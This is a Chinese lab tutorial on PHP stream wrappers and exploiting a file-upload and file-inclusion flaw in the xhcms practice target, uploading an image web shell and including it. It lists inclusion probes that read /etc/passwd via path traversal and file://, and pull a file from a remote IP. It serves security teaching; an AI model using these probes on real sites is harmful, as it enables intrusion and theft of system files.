当前位置: 首页 > news >正文

w24文件上传之PHP伪协议

PHP支持的伪协议

file:// - 访问本地文件系统
http:// - 访问网址
ftp:// - 访问文件
php:// -访问各个输入/输出流
zlib:// -压缩流
data:// - 数据
glob:// -查找匹配的文件路径模式
phar:// - php归档
ssh2:// - Secure shell 2
rar:// - RAR
ogg:// - 音频流
expect:// - 处理交互式的流

各协议的利用条件和方法

在这里插入图片描述

熊海靶场安装(xhcms)

安装环境

burp2024
phpstudy 5.3.29nts+apache
火狐浏览器(谷歌浏览器不能找到文件包含漏洞)

1.创建网站
在这里插入图片描述
2.安装靶场

在这里插入图片描述
3.输入正确的数据库用户名和密码,自动导入,此时php的版本不要太高,不能选择7.x以上的本吧。选择5.2~5.3的版本即可,否则页面的内容展示不了。
在这里插入图片描述
4.在发布文章,有图片的上传点,开始爆破。
在这里插入图片描述
5.上传一个包含phpinfo的图片马,返回文件上传后的路径/upload/watermark/20581706431088.gif
在这里插入图片描述
6.成功上传,要解析图片马,需要找到文件包含漏洞,根据文件包含的特征,匹配网站内的请求

文件包含漏洞的特征
?page=a.php
?home=b.html
?file=content
检测方法
?file=../../../../etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://192.168.189.78/1.txt
http://1.1.1.1/../../../../dir/file.txt

在首页的美国时间,找到的文件包含漏洞,该路径包含了ustime.php文件。

在这里插入图片描述

7.拼接请求
在这里插入图片描述

http://www.lryc.cn/news/290409.html

相关文章:

  • SQL注入攻击 - 基于时间的盲注
  • 比VS Code快得多
  • 将一个excel文件里面具有相同参数的行提取后存入新的excel
  • Linux下安装edge
  • Java / Spring Boot + POI 给 Word 添加水印
  • Unity打包Android,jar文件无法解析的问题
  • postman之接口参数签名(js接口HMAC-SHA256签名)
  • 从c到c++——6:auto
  • 前端面试题:字符串中字符出现的最多次数
  • 获取鼠标点击图片时候的坐标,以及利用html 中的useMap 和area 实现图片固定位置的点击事件
  • webassembly003 TTS BARK.CPP
  • HiveSQL题——排序函数(row_number/rank/dense_rank)
  • 【C语言】(9)分支结构
  • Flink 集成 Debezium Confluent Avro ( format=debezium-avro-confluent )
  • R语言(数据导入,清洗,可视化,特征工程,建模)
  • springboot 整合 Activiti6
  • 微信小程序canvas画布实现直线自由缩放、移动功能
  • Cesium数据加载
  • 【C++历练之路】探秘C++三大利器之一——多态
  • 业务逐字稿
  • 微服务舞台上的“三步曲“:Spring Cloud 服务注册、服务发现与服务调用
  • 中间件
  • 4D毫米波雷达——ADCNet 原始雷达数据 目标检测与可行驶区域分割
  • 「优选算法刷题」:提莫攻击
  • 260:vue+openlayers 通过webgl方式加载矢量图层
  • Android 8.1 相关修改
  • EG-2121CA (晶体振荡器 低抖动表面声波(SAW)振荡器)
  • Django知识随笔
  • Facebook 广告帐户:多账号运营如何防止封号?
  • 酷开会员 | 用酷开系统点亮多彩休闲时刻